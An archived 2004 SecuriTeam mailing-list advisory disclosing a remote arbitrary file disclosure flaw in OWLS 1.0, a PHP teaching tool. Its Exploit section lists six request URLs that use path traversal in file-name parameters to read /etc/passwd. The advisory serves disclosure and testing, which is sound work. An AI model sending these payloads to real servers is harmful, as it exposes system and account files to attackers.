[UNIX] OWLS Remote Arbitrary Files Disclosure

From: SecuriTeam (support_at_securiteam.com)
Date: 02/18/04

  • Next message: SecuriTeam: "[UNIX] Linux Kernel do_mremap VMA Limit Local Privilege Escalation Vulnerability" 
    To: list@securiteam.com
Date: 18 Feb 2004 16:28:25 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      OWLS Remote Arbitrary Files Disclosure
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.foolsworkshop.com/owls/> OWLS is a web-based environment for
    instructors of language to easily create exercises, readings, glossaries,
    and present media for their students. Once installed on a web server that
    supports PHP, instructors can create materials or upload media for
    presentation to their students through a simple form based interface". A
    vulnerability in the product allows remote attackers to disclosure files
    that would be otherwise inaccessible.

    DETAILS

    Vulnerable Systems:
     * OWLS version 1.0

    There is a vulnerability in the current version of OWLS that allows an
    attacker to retrieve arbitrary files from the web server with its
    privileges.

    Exploit:
    Any of the following URLs can be used to test your system for the
    mentioned vulnerability:
    http://address/owls/glossaries/index.php?file=/etc/passwd
    http://address/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
    http://address/owls/readings/index.php?filename=/etc/passwd
    http://address/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
    http://address/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
    http://address/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:g00db0y@zone-h.org> G00db0y
    from Zone-h Security Labs.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Linux Kernel do_mremap VMA Limit Local Privilege Escalation Vulnerability"

    Relevant Pages